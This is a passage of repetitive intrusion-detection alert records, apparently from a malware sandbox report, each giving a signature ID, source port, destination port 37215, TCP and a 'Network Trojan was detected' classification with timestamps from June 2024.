          SID:2829579
          Source Port:41182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165674
          SID:2835222
          Source Port:54950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159653
          SID:2835222
          Source Port:39558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636117
          SID:2829579
          Source Port:45702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538977
          SID:2835222
          Source Port:35882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643641
          SID:2829579
          Source Port:59822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247441
          SID:2829579
          Source Port:41758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677297
          SID:2835222
          Source Port:47156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081802
          SID:2829579
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916982
          SID:2835222
          Source Port:49150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137942
          SID:2829579
          Source Port:58712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120766
          SID:2829579
          Source Port:55560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540077
          SID:2835222
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606956
          SID:2835222
          Source Port:47292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164939
          SID:2829579
          Source Port:42716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821941
          SID:2829579
          Source Port:41904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074384
          SID:2835222
          Source Port:37966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415153
          SID:2835222
          Source Port:35290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602523
          SID:2829579
          Source Port:52500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158096
          SID:2829579
          Source Port:43384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205366
          SID:2835222
          Source Port:38484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417479
          SID:2835222
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166084
          SID:2835222
          Source Port:36148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687449
          SID:2835222
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417579
          SID:2835222
          Source Port:36248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984213
          SID:2835222
          Source Port:50942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539370
          SID:2829579
          Source Port:37488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678103
          SID:2835222
          Source Port:49150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822729
          SID:2835222
          Source Port:36452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538326
          SID:2835222
          Source Port:38432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868962
          SID:2835222
          Source Port:34270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396140
          SID:2829579
          Source Port:38198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.648028
          SID:2835222
          Source Port:38320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300925
          SID:2835222
          Source Port:55000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561972
          SID:2829579
          Source Port:37024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860347
          SID:2835222
          Source Port:60788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418605
          SID:2835222
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931626
          SID:2829579
          Source Port:59720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598025
          SID:2829579
          Source Port:37068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419040
          SID:2835222
          Source Port:50728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242645
          SID:2829579
          Source Port:60448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029198
          SID:2829579
          Source Port:46680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.899294
          SID:2829579
          Source Port:60204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818573
          SID:2835222
          Source Port:45388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168170
          SID:2829579
          Source Port:45308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164154
          SID:2829579
          Source Port:59292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645137
          SID:2835222
          Source Port:60274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243529
          SID:2829579
          Source Port:50660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.266537
          SID:2829579
          Source Port:53258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996339
          SID:2829579
          Source Port:48128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224794
          SID:2829579
          Source Port:49596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162629
          SID:2829579
          Source Port:44258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028487
          SID:2829579
          Source Port:56384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644022
          SID:2835222
          Source Port:43742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926321
          SID:2835222
          Source Port:57914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538958
          SID:2835222
          Source Port:33066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684637
          SID:2829579
          Source Port:47738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206132
          SID:2829579
          Source Port:32926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268430
          SID:2829579
          Source Port:45308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079342
          SID:2835222
          Source Port:59558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037733
          SID:2835222
          Source Port:44948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480688
          SID:2835222
          Source Port:37752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713445
          SID:2835222
          Source Port:59204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163921
          SID:2829579
          Source Port:45754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821012
          SID:2829579
          Source Port:36490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396570
          SID:2835222
          Source Port:45074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942074
          SID:2829579
          Source Port:41832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928821
          SID:2835222
          Source Port:45476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986563
          SID:2829579
          Source Port:36892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597252
          SID:2835222
          Source Port:51908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038391
          SID:2829579
          Source Port:38834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567616
          SID:2829579
          Source Port:39010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995715
          SID:2829579
          Source Port:47806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028445
          SID:2829579
          Source Port:45608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162666
          SID:2835222
          Source Port:52838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.951626
          SID:2835222
          Source Port:35910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.126298
          SID:2829579
          Source Port:50932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253271
          SID:2835222
          Source Port:51712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598110
          SID:2835222
          Source Port:37434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718501
          SID:2835222
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819142
          SID:2829579
          Source Port:39024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102696
          SID:2829579
          Source Port:36528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945466
          SID:2829579
          Source Port:57328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227377
          SID:2829579
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869010
          SID:2829579
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289553
          SID:2829579
          Source Port:42392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038160
          SID:2829579
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719876
          SID:2835222
          Source Port:39974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682114
          SID:2835222
          Source Port:41324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004037
          SID:2829579
          Source Port:44910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130218
          SID:2829579
          Source Port:50294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010739
          SID:2829579
          Source Port:33592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714361
          SID:2835222
          Source Port:45420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289459
          SID:2835222
          Source Port:39806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038874
          SID:2835222
          Source Port:47706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905891
          SID:2829579
          Source Port:59344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076191
          SID:2835222
          Source Port:53552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077739
          SID:2835222
          Source Port:58464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818393
          SID:2835222
          Source Port:46926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867880
          SID:2835222
          Source Port:48394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418728
          SID:2835222
          Source Port:40498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224524
          SID:2835222
          Source Port:50912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398810
          SID:2835222
          Source Port:52954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227745
          SID:2829579
          Source Port:50050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923751
          SID:2829579
          Source Port:34994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165467
          SID:2829579
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032673
          SID:2829579
          Source Port:49416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987509
          SID:2835222
          Source Port:34676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864381
          SID:2829579
          Source Port:45740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593954
          SID:2829579
          Source Port:41028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399617
          SID:2835222
          Source Port:41150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076336
          SID:2835222
          Source Port:50420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288995
          SID:2835222
          Source Port:34488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034833
          SID:2829579
          Source Port:49588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105393
          SID:2835222
          Source Port:55158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716751
          SID:2835222
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718235
          SID:2835222
          Source Port:33578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280524
          SID:2829579
          Source Port:39910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714455
          SID:2835222
          Source Port:35396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716903
          SID:2835222
          Source Port:56278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929464
          SID:2829579
          Source Port:59026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162574
          SID:2829579
          Source Port:60114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718359
          SID:2829579
          Source Port:59730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471794
          SID:2835222
          Source Port:39684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713083
          SID:2835222
          Source Port:35706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416060
          SID:2829579
          Source Port:39196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248181
          SID:2829579
          Source Port:60852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645448
          SID:2829579
          Source Port:53408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033691
          SID:2829579
          Source Port:37440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869726
          SID:2835222
          Source Port:59766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598072
          SID:2829579
          Source Port:54948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904630
          SID:2829579
          Source Port:56932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716181
          SID:2835222
          Source Port:47670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822750
          SID:2835222
          Source Port:49718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924433
          SID:2835222
          Source Port:44592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230855
          SID:2835222
          Source Port:36298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299103
          SID:2829579
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950220
          SID:2835222
          Source Port:32938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916723
          SID:2835222
          Source Port:58870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030369
          SID:2829579
          Source Port:45696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168862
          SID:2835222
          Source Port:53240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571571
          SID:2835222
          Source Port:58112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302496
          SID:2829579
          Source Port:36438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078981
          SID:2835222
          Source Port:59318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162790
          SID:2829579
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035823
          SID:2829579
          Source Port:40410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860705
          SID:2829579
          Source Port:47630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418153
          SID:2829579
          Source Port:59590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952174
          SID:2829579
          Source Port:40664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713858
          SID:2835222
          Source Port:35580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601114
          SID:2835222
          Source Port:43444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892597
          SID:2829579
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996498
          SID:2829579
          Source Port:55936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162787
          SID:2829579
          Source Port:41322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080198
          SID:2829579
          Source Port:35120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224996
          SID:2835222
          Source Port:37626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596179
          SID:2835222
          Source Port:56172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077854
          SID:2829579
          Source Port:52346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004319
          SID:2835222
          Source Port:35026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541573
          SID:2835222
          Source Port:54870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225610
          SID:2829579
          Source Port:59450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566289
          SID:2835222
          Source Port:44702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129679
          SID:2829579
          Source Port:53330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870797
          SID:2835222
          Source Port:40516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274642
          SID:2835222
          Source Port:57534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719253
          SID:2835222
          Source Port:49900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918214
          SID:2835222
          Source Port:52604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605934
          SID:2829579
          Source Port:52432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718793
          SID:2835222
          Source Port:53434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294090
          SID:2835222
          Source Port:39502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929083
          SID:2835222
          Source Port:58980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285498
          SID:2829579
          Source Port:44146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950038
          SID:2829579
          Source Port:59594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.988963
          SID:2829579
          Source Port:34626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910714
          SID:2829579
          Source Port:41394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993371
          SID:2835222
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004454
          SID:2829579
          Source Port:51260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077687
          SID:2829579
          Source Port:45884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417819
          SID:2835222
          Source Port:48252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296810
          SID:2829579
          Source Port:35028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926880
          SID:2835222
          Source Port:40114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923159
          SID:2835222
          Source Port:44336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602456
          SID:2829579
          Source Port:53718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592770
          SID:2829579
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284203
          SID:2829579
          Source Port:34958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102167
          SID:2829579
          Source Port:39828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163984
          SID:2835222
          Source Port:38542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418925
          SID:2829579
          Source Port:54698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396323
          SID:2829579
          Source Port:33166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412469
          SID:2835222
          Source Port:54120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120536
          SID:2829579
          Source Port:58738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922130
          SID:2835222
          Source Port:59750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.859284
          SID:2829579
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928131
          SID:2829579
          Source Port:36676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719940
          SID:2835222
          Source Port:58460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274746
          SID:2835222
          Source Port:51452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286141
          SID:2835222
          Source Port:36322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417480
          SID:2829579
          Source Port:42364
          Destination Port:37215
